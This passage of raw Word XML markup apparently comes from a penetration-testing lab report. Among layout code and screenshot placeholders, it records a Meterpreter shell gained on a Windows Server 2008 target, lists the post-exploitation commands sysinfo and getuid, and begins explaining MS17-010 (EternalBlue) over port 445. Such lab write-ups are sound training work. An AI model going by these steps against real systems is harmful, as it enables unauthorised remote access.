                        <wps:cNvPr id="1711" name="Rectangle 1711"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5810453" y="3651098"/>
                            <a:ext cx="50673" cy="224380"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7061F593"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712" name="Rectangle 1712"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="3981806"/>
                            <a:ext cx="50673" cy="224380"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="032ADA10"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25" name="Picture 1725"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId30"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="37795" y="14351"/>
                            <a:ext cx="5731510" cy="3738880"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="1726" name="Shape 1726"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="23508" y="0"/>
                            <a:ext cx="5760085" cy="3767455"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5760085" h="3767455">
                                <a:moveTo>
                                  <a:pt x="0" y="3767455"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5760085" y="3767455"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="576008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00" style="width:460.516pt;height:326.812pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="58485,41505">
                <v:rect id="Rectangle 1711" style="position:absolute;width:506;height:2243;left:58104;top:36510;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1712" style="position:absolute;width:506;height:2243;left:0;top:39818;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 1725" style="position:absolute;width:57315;height:37388;left:377;top:143;" filled="f">
                  <v:imagedata r:id="rId31"/>
                </v:shape>
                <v:shape id="Shape 1726" style="position:absolute;width:57600;height:37674;left:235;top:0;" coordsize="5760085,3767455" path="m0,3767455l5760085,3767455l5760085,0l0,0x">
                  <v:stroke weight="2.25pt" endcap="flat" joinstyle="round" on="true" color="#ff0000"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5104D1A0" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EAB7AC" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="276" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07952571" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCA1F5D" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08221F49" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2016E799" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="274" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BF9547" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CE7D37" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="276" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA67834" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065E38D6" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B72A54" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DFC861" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="535" w:lineRule="auto"/>
        <w:ind w:right="4514"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Successful Exploitation </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Meterpreter &gt; shell received </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1738B6" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="323" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Commands use: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E7612D" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="270" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="2084" w:hanging="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = to confirm Windows 2008 target </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0487EAFF" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="329" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4EDE79" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="262"/>
        <w:ind w:right="2084" w:hanging="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = to confirm system access </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B9BDC0" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="9" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B1108B" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="253" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="37" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="143FC141" wp14:editId="6CE5A098">
                <wp:extent cx="4854258" cy="3575711"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="21945" name="Group 21945"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4854258" cy="3575711"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4854258" cy="3575711"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1771" name="Rectangle 1771"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="662241" y="23622"/>
                            <a:ext cx="62024" cy="206453"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="731AA4F8" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">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1772" name="Rectangle 1772"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="709486" y="0"/>
                            <a:ext cx="56314" cy="226001"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="52534066" w14:textId="77777777" w:rsidR="0086222C"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773" name="Rectangle 1773"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="890842" y="32254"/>
                            <a:ext cx="433558" cy="184382"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7A0568E3" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                                <w:jc w:val="left"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">shell </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1774" name="Rectangle 1774"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1216978" y="32254"/>
                            <a:ext cx="101346" cy="184382"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="59B9EF37" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                                <w:jc w:val="left"/>
                              </w:pPr>
                              <w:r>
                                <w:t>–</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1775" name="Rectangle 1775"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1293178" y="32254"/>
                            <a:ext cx="50673" cy="184382"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1DA960B6"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776" name="Rectangle 1776"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1331278" y="32254"/>
                            <a:ext cx="2070905" cy="184382"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="612D2357" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                                <w:jc w:val="left"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">full remote access to </w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:t>cmd</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1777" name="Rectangle 1777"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2889187" y="2133"/>
                            <a:ext cx="50673" cy="224381"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0B364E48"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778" name="Rectangle 1778"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4816158" y="3407004"/>
                            <a:ext cx="50673" cy="224380"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="08F002F2"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85" name="Picture 1785"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId32"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="14288" y="397509"/>
                            <a:ext cx="4762500" cy="3106420"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="1786" name="Shape 1786"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="383286"/>
                            <a:ext cx="4791075" cy="3134995"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="4791075" h="3134995">
                                <a:moveTo>
                                  <a:pt x="0" y="3134995"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="4791075" y="3134995"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="479107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45" style="width:382.225pt;height:281.552pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="48542,35757">
                <v:rect id="Rectangle 1771" style="position:absolute;width:620;height:2064;left:6622;top:236;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:cs="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:ascii="Calibri"/>
                          </w:rPr>
                          <w:t xml:space="preserve">-</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1772" style="position:absolute;width:563;height:2260;left:7094;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773" style="position:absolute;width:4335;height:1843;left:8908;top:322;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve">shell </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1774" style="position:absolute;width:1013;height:1843;left:12169;top:322;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve">–</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1775" style="position:absolute;width:506;height:1843;left:12931;top:322;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1776" style="position:absolute;width:20709;height:1843;left:13312;top:322;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve">full remote access to cmd</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1777" style="position:absolute;width:506;height:2243;left:28891;top:21;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1778" style="position:absolute;width:506;height:2243;left:48161;top:34070;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 1785" style="position:absolute;width:47625;height:31064;left:142;top:3975;" filled="f">
                  <v:imagedata r:id="rId33"/>
                </v:shape>
                <v:shape id="Shape 1786" style="position:absolute;width:47910;height:31349;left:0;top:3832;" coordsize="4791075,3134995" path="m0,3134995l4791075,3134995l4791075,0l0,0x">
                  <v:stroke weight="2.25pt" endcap="flat" joinstyle="round" on="true" color="#ff0000"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D47B43" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="276" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3289A038" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D446E1" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB00AF8" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A18EC9" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEF5B76" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="-5" w:right="1637"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc23323"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2.2.2 Selected Critical Vulnerability: MS17-010 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="1B947851" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="177" w:line="402" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="1637"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Why does it exist? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D8799C" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="288"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The victim OS (Windows Server 2008) was missing critical patches from 2017. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BE171E" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="272"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Microsoft failed to sanitize inputs in the SMBv1 protocol stack. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4789E05B" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="323" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">How can an attacker exploit it? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F70EE6F" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="188" w:line="395" w:lineRule="auto"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">By sending a specially crafted packet to port 445, an attacker can execute arbitrary code without authentication. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A77D6F6" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="269"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
